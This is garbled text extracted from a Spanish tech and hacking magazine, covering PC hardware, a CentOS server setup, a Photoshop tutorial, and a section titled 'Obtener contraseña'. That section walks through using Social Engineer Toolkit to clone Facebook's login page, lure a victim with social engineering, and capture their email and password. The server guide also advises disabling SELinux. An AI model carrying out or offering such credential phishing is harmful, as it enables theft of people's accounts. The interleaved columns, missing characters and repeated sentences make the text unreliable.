que permiten su mantenimiento. nmeros (2+2) con la calculadora que trae Unidad central de
el sistema operativo windows, decimos proceso:
Software de programacin: entonces que ingresamos datos ( 2+2) por
medio del teclado, los que al presionar en
Es el conjunto de herramientas que el botn con el smbolo = para que nos
permiten al programador desarrollar devuelva el resultado sern procesados por
programas informticos, usando diferentes el microprocesador y ste nos responder
alternativas y lenguajes de programacin, en el monitor el resultado que lo La unidad central
de una manera prctica. denominaremos informacin (es este caso de proceso (CPU) segn la mayora de
el nmero 4). los usuarios representa al gabinete o
Incluye entre otros:
carcasa de la computadora. CPU en
_ Editores de texto La presentacin de datos seria a si: Las PC realidad es el microprocesador el cual
_ Compiladores o computadoras personales trabajan con la tiene como principal objetivo procesar
_ Intrpretes base del sistema de numeracinb binaria los datos.
(nmeros 0 y 1). Convengamos que un
microprocesador se puede dividir en
dos reas:
rea de trabajo rea de Control

34 SeNeGe
Las fuentes de alimentacin entregan
Son la que determinan la velocidad y la Sempron 55 80
distintos voltajes a los componentes
eficiencia del procesador. Las reas de Celeron D 45 70
de la PC.
ejecucin encargada de dar las rdenes a Athlon x2 55 85
las diversas partes del microprocesador se Pentium 4 2Ghz 42 75
clasifican en: Intel Core 2 Duo 52 85
Unidad Aritmtica Lgica y Unidad de punto
Flotante Factor de formas
Encargada de realizar todas las operaciones Las placas madres se pueden
matemticas y lgicas. Maneja operaciones diferenciar segn sus caractersticas,
avanzadas de las matemticas (tales como tamao, etc.
funciones trigonomtricas y trascendentales) Normalmente se clasifican segn su
con mayor precisin. Se encarga de verificar factor de forma (XT, AT, ATX, ATX 2).
12V (cable amarillo y uno de los de color
que los datos procesados sean correctos.
negro) se utilizan para
La velocidad de mide en MHz, esto representa Veamos en el grfico la
alimentar motores dentro de la PC.
la cantidad de veces por segundos que el ubicacin de cada
Ej. Motor de Disqueteras, motor de
procesador puede realizar cierto clculo o componente:
Discos Rgidos, motor de CDROM.
proceso. A continuacin se presenta una
pequea tabla que ayudar con las unidades de
5V (cable rojo y uno de los de color
medidas:
negro) se utilizan para alimentar
circuitos dentro de la PC.
1 Hz 1 Hz
1 Mhz 1000 Hz
Ej. Placa lgica de disco duro, placas
1Ghz 1000 Mhz
de expansin, etc.
Si compramos procesadores de 2 ncleos
como un microprocesador Intel Core 2 duo
3,3V o menos se incorporan debido a
(que permite trabajar con 64bits) pero
que las caractersticas de diseo de las
nuestro Sistema Operativo (por ejemplo el
nuevas PC, hacen que sus
Windows XP) es de 32Bits nunca
componentes consuman menos tensin
aprovecharemos dicho procesador ya que
que antes, Ej. (Microprocesador,
el mismo trabara solo a 32bits.
memorias, placas de video, etc.)

Zcalo del microprocesador


El zcalo o socket es donde insertamos el
Gabinetes y tipos:
microprocesador. Est ubicado en la placa
La carcasa o gabinete de un equipo es el
madre (detallaremos placa madre en las
esqueleto metlico (los hay tambin de
prximas unidades)
alumnio, plstico, acrlico, etc) que
contiene los diferentes componentes
Fuentes de alimentacin
internos de la PC.

Basicamente hablamos de la fuente ..


Mini Tower (son pequeos y utilizados en
Que cumple funciones bsicas como:
espacios reducidos).
_ Rectificar la corriente alterna a corriente
continua.
Mdium Tower (es el ms utilizado en la
_ Generar los voltajes de corriente continua
actualidad).
Voltajes de la fuente de alimentacin:

Full Tower (es el ms grande, usado


Temperatura de los
normalmente para servidores).
procesadores
Las temperaturas del Procesador ideal
Slim Tower (similar al minitower pero
minima y Temperatura mxima
ms delgado).
35
En la siguiente imagen podemos
Desktop (gabinete dispuesto en forma Funcionamiento del visualizar el cable de datos (o bus de
horizontal) tiene como particularidad la disco duro datos) y el cable de alimentacin que van
posibilidad se apoyar encima de ste el
conectados al disco duro ATA.
monitor reduciendo espacio. Los cabezales se desplazan
sincronizadamente y se introducen como
un peine dentro de los espacios vacos o
libres entre los discos que estn girando.
Es importante aclarar que cuando hablamos
del disco duro siempre nos imaginamos un
diferencia de los discos ATA (IDE), los
solo disco o plato interno girando.
discos SATA no se configuran, ya que el
bus de datos de la placa del disco duro
solo permite una sola unidad por conector.

Una de las ventajas es la velocidad si la


Ventilacin del gabinete comparamos con los discos ATA (hasta
El gabinete tiene entre sus funciones crear
133Mb/s) en este caso los discos SATA
una corriente de aire interna para refrigerar
tienen una tasa de transferencia de unos
los distintos componentes internos.
300Mb/s.
Puede haber ms de un cooler o ventilador
interno. Adems suele haber modelos de
gabinetes donde una de sus tapas laterales
contiene un cooler. La distancia entre cabezal y superficie de
disco es aproximadamente a una centsima
A continuacin la imagen: parte del promedio de un cabello humano.

Tipos de discos duros


segn tecnologa

IDE (Integrated Drive Electronics) es una


denominacin comercial, ya que la
denominacin tcnica para estos discos
duros es ATA (Conexin AT), deriva del
diseo original, el cual era conectar una
Pendrive
combinacin de unidad y controlador al bus
Medidas actuales de diversos dispositivos de una computadora AT.
Es un dispositivo de almacenamiento que
de Almacenamiento
utiliza la memoria flash para almacenar la
informacin sin necesidad de pilas o
Dispositivo Capacidad
Disco Duro 160Gb 250Gb 320Gb
bateras.
500Gb 750GB 1000Gb
Es importante a la hora de quitar el
Disquete 1,44 Mb
dispositivo del puerto USB, previamente
CD 700Mb
desde el Windows realicemos la siguiente
DVD 4,7Gb La ventaja del
tarea:
Cinta magntica 40Gb 80Gb cable de 80 hilos que al tener hilos a masa
Pendrive 1Gb 2Gb 4Gb 8Gb 16Gb disminuye las interferencias elctricas que
Nos ubicamos en la barra de tareas
32Gb pueden producir los hilos de tensin.
(normalmente est abajo del escritorio de
Memoria SD y micro SD 1Gb 2Gb 4Gb
windows) y desde el cono que aparece en
8Gb
la esquina inferior derecha de la barra
Bluray 25Gb 50Gb
antes mencionada (al lado de la hora de la
PC)

36\
Perifricos de salida son los que reciben
la informacin de la CPU y la muestran
Hacemos doble clic y luego seleccionamos al
donde dice Dispositivo de almacenamiento usuario. Ejemplos: monitor, parlantes,
masivo USB y presionamos en el botn impresoras.
llamado Detener.

Perifricos de entrada/salida son el caso


tpico de las impresoras multifuncin (las
mismas tienen la posibilidad de escanear
e imprimir)

Perifricos de almacenamiento son


aquellos encargados de almacenar los
datos.
Ejemplos: disco duro, cd, dvd, pendrive.

Perifricos de comunicacin permiten el


vnculo entre computadoras o entre la PC
y otros perifricos. Ejemplos:
fax/modem, hub, switch, router, placa de
Visualizaremos una ventana en la cul red, placa madre.
marcaremos el dispositivo a
desconectar (en este caso un pendrive Monitores
marca CORSAIR y luego presionamos CRT (tubo de rayos catdicos)
en Aceptar.

Resoluciones aconsejables de los


monitore
Tamao de monitor Cantidad de pxeles

14 640 x 480
15 800 x 600
17 1024 x 768
19 1280 x 1024
20 1600 x 1280
211600x1280
Una vez respetado estos pasos podemos
quitar con seguridad nuestro pendrive. LCD (Display o pantalla de cristal
lquido)
Tipos de perifricos Un punto a tener en cuenta a la hora de
elegir un monitor es la entrada de datos,
Perifricos de entrada hay monitores que traen incorporados el
_ Perifricos de salida conector VGA y el DVI.Un punto a tener
_ Perifricos de entrada/salida en cuenta a la hora de elegir un monitor
_ Perifricos de almacenamiento es la entrada de datos, hay monitores que
_ Perifricos de comunicaci traen incorporados el conector VGA y el
Perifricos de entrada son los que permiten DVI.Un punto a tener en cuenta a la hora
ingresar datos externos nuestra de elegir un monitor es la entrada de
computadora. Algunos de estos perifricos datos, hay monitores que traen
son: teclado, micrfono, webcam, escner, incorporados el conector VGA y el DV
Mouse y otros.

37\
Obtener contrasea de
Iniciamos nuestro backtrack
Ahora iniciamos The SocialEngineer Toolkit
(SET)

Luego la opcin 3 y enter

Luego la opcin 2 y enter

Despues la opcin 2 y enter

Nos mandara un pantalla:

Luego la opcin 3 y enter

Nos dice que la herramienta no se use con fines


malintencionados sino de prueba, le damos Y y
ENTER

Luego la opcin 2 y enter

Elegimos la opcin 1 y enter

38 arthusu
Ahora se la pasamos a alguien con un poco de
ing. Social

Ponemos la url que queremos clonar el sitio en este


caso facebook XD! (la url tiene que llevar http :D )
Luego enter y enter y esta escuchando en el puerto
80 los que entren capturando las pass.

El mete su correo y contrasea

Por eso hay que fijarse en la url

Ponemos ifconfig para ver nuestra ip ahora cuando

El se logea y nos sale su correo y pass

entremos desde otra pc a esa ip

El se logea y nos sale su correo y pass...

39
LEVANTANDO EL HYPER
INTRODUCCION mencionaron.

# IMPORTANE: en todo momento SI TIENES UNA VERSION Pero una vez que crece mas tu pagina y pasa de ser a pagina
menor a 6 de CentOS, puedes considerar seguir el manual comun (o blog) a una plataforma de sevicios, es cuando en
siempre y cuando en la parte de "REPOS" instales los sitorios realidad vez la gran necesidad de mejor adquirir un servidor
que vayan para tu version. debido a las grandes limitaciones de un servico de Hosting.

En este manual practico aprenderas como instalar un servidor La alternativa a un Hosting, seria la contratacion de un Servidor
GNU/Linux basado en la distribucion CentOS, he utilizado la Dedicado o Servidor Dedicado Virtual.
version actual mas nueva (CentOS 6), asumiendo que ya
tenemos instalado CentOS aprenderas sobre todos los servicios DEDICADOS
que debe contar un servidor, la instalacion y configuracion Los servidores dedicados se dividen en dos, los servidores
basica de los servicios. dedicados normales y dedicados virtuales:

Estas implementaciones son recomendadas 100% para Un Servidor Dedicado Virtual es basicamente una maquina
servidores dedicados (en la nube), pero debes tomar en cuenta virtual (VirtualBox, VMWare o Xen) que corre en un servidor
que en todo momento pueden servirte tambien para un servidor fisico real,
local. el unico detalle es que si tu proveedor tiene 10 virtuales corriendo,
entonces toda la RAM es compartida entre los 10 virtuales. Y
TIPOS DE SERVICIOS entre otras limitaciones:

HOSTING No puedes crear mas virtuales dentro de tu virtual.


Generalmente cuando tienes un primer acercamiento a El ancho de banda es compartido.
servidores y pretender levantar un sitio web con contenido Si la maquina virtual tiene limitaciones, entonces tu sistema
basico y servicios muy comunes (face connect, blog, comments, operativo las hereda.
etc...) lo mas sencillo es contratar un servidior de Hosting en Si tu proveedor tiene una sola tarjeta de red, entonces todos los
donde el proveedor de Hosting te proporciona una cantidad virtuales pasan por la misma interface.
limitada o especifica de espacio en disco duro para
almacenamiento de datos, acceso a servicios externos necesarios En un Servidor Dedicado normal, basicamente se te esta
como: MySQL, Postfix (servidor de correo) y DNS (para el arrendando un equipo de computo fisico completo, gozando de
dominio). todos los servicios como si tuvieses la maquina puesta en tu
propia casa o negocio.
En un Servicio de Hosting existen limitaciones muy marcadas
como: Las ventajas son muy amplias:

Tienes un espacio limitado en disco duro para almacenamiento Puedes instalar cualquier servicio (FTP, Apache, Bind, MySQL,
de datos. Asterisk, Icecast, Virtuales, VNC, SSH, etc..).
El servicio de Base de Datos MySQL es limitado a cierto Tienes acceso a una consola para manejar tu equipo,
numero de bases creadas y peso en consumo total.
El servidor Postfix (SMTP) esta limitado a un numero de Las limitaciones:
correos de salida diarios.
El ancho de banda es limitado a cierto consumo. Tu te encargas de tu seguridad.
No tienes acceso a un DNS, solo a establecer tu propio Tu configuras todo.
dominio. Tu te encragas de respaldar.
Existe una limitacion en la creacion de subdominios. Debes tener amplios conocimientos.
El servidro FTP te limita a cierto numero de cuentas.
No puedes requerir mas servicios, mas los que ya se Es recomendable un servidor dedicado cuando tus exigencias y

40 ANGEL
SELinux: "Disables"
necesidades sobre pasan a un servicio de hosting comun :D.
Damos Ok y hay que reiniciar: shell# reUPDATE CENTOS

INTERFACES
Ya configurado todo, debemos rehacer update:
Si tenemos una o varios IPs estaticas pero solo contamos con una
sola tarjeta de red, lo mas correcto seria configurar hebras de la
# importamos llaves de servidores default
misma configuracion donde solo vamos poniendo las demas IPs
shell# rpm import /etc/pki/rpmgpg/RPMGPGKEY*
asociando estas nuevas IPs con un valor de ethX compartido.
shell# yum update y
REPOS
shell# cd /etc/sysconfig/networkscripts/
Es bueno tener otros Repositorios habilitados ya que comunmente
# ip estatica 1 eth0 los repos por default no tienen muchos mas archivos que suelen ser
shell# cat ifcfgeth0 necesarios a la hora de quere otras aplicaciones o implementaciones
DEVICE=eth0
de seguridad en nuestro server:
BOOTPROTO=none
ONBOOT=yes
IPADDR=10.10.10.1 # paquete necesario
NETMASK=255.255.255.0 shell# yum install y rpmlibs
GATEWAY=10.10.10.254 shell# yum install y yumutils
TYPE=Ethernet
HWADDR=aa:bb:cc:dd:ee:ff # repos
shell# cd /etc/pki/rpmgpg/
# ip estatica 2 eth0:0 shell# wget http://apt.sw.be/RPMGPGKEY.dag.txt
shell# cat ifcfgeth0:0 shell# rpm import RPMGPGKEY.dag.txt
DEVICE=eth0:0 shell# wget http://dl.fedoraproject.org/pub/epel/6/i386/epelrelease
BOOTPROTO=none 65.noarch.rpm
ONBOOT=yes shell# rpm import epelrelease65.noarch.rpm
IPADDR=10.10.10.2 shell# wget http://rpms.famillecollet.com/RPMGPGKEYremi
NETMASK=255.255.255.0 shell# rpm import RPMGPGKEYremi
GATEWAY=10.10.10.254 shell# wget http://ATrpms.net/RPMGPGKEY.atrpms
TYPE=Ethernet shell# rpm import RPMGPGKEY.atrpms
HWADDR=aa:bb:cc:dd:ee:ff
# editar EPEL y agregar una linea
# ip estatica 3 eth0:1 shell# cd /etc/yum.repos.d/
shell# cat ifcfgeth0:1 shell# cat epel.repo
DEVICE=eth0:1 [epel]
BOOTPROTO=none ...
ONBOOT=yes priority=10
IPADDR=10.10.10.3 ...
NETMASK=255.255.255.0 # repo RPMForge para Cento5
GATEWAY=10.10.10.254 shell# wget
TYPE=Ethernet http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge
HWADDR=aa:bb:cc:dd:ee:ff release*rpm
shell# rpm Uvh rpmforgerelease*rpm
# reiniciar para cargar cambios
shell# /etc/init.d/network restart # repo ATRpms
shellt# wgethttp://dl.atrpms.net/el5x86_64/atrpms/stable/atrpms
# ver las interfaces repo*rpm
shell# ifconfig a shell# rpm Uvh atrpmsrepo*rpm

# actualizacion
DESHABILITAR SELINUX shell# yum install y yumpriorities
El SELinux es un firewall integrado en CentOS que mas que ayudar, shell# yum update y
siempre ya un monton de problemas, lo mas recomendable es
montarnos nuestras propias reglas de firewall y no depende de la PAQUETES BASE
automatizacion, ya que SELinux es tan delicado, que por el simple Todo sistema GNU/Linux siempre usa un conjunto de paquetes que
echo de hacerle PING al server, nos bannea el IP y no podemos se requiere en todoas partes y por cualquier software independiente,
conectarnos de ninguna forma. te recomiendo instales estos paquetes como base (los primer que
instales en tu server):
# deshabilitando selinus
shell# systemconfigsecurityleveltui shell# yum install y fetchmail wget bzip2 unzip zip nmap openssl
lynx fileutils gcc gccc++
Security Level: ( ) Enables (*) Disables
continuara...

41
FOTOMONTAJE
Hola compaeros les vengo enter
a dejar este gran tutorial Para validar la seleccin nos debe de
de como crear un
fotomontaje usando 2
animales distintos y
obteniendo un gran
resultado espero y
aprendan bueno empezamos.
Primero que nada abrimos
las 2 imgenes como se
muestra en la siguiente
imagen Yo utilizare
Estas 2 imgenes

quedar algo as..


Ya seleccionada la cabeza
del guila la arrastramos a
la siguiente imagen
pescado y le damos Ctrl+t
y seleccionamos voltiar
horizontalmente

Ya abierta la primera imagen utilizaremos


Ie acomodamos la cabeza del
aguila como en la siguiente

la herramienta de lazo magntico

Ie seleccionamos toda la cabeza del guila


detalladamente ya teniendo eso listo damos

42 m3x1c0h4ck
imagen. pasamos encima del guila nos
Le bajamos la opacidad i con quedara as,
la herramienta borrador La primera capa le damos en
borramos esas partes que crear mascara de recorte

sobran para dejarla igual que presionando ctrl+alt+g


la cabeza del pez. Algo as I la poner en modo oscurecer
Ahora ocultamos la capa del i nos quedara asi.
guila i hacemos una
seleccin con la herramienta

Ahora para finalizar damos


ctrl+t i en deformar i la
deformamos i nos quedara asi

lazo magntico. Este es el resultado final


Luego de eso duplicamos esa
capa presionando ctrl+j
I la capa duplicada la

43

You might also like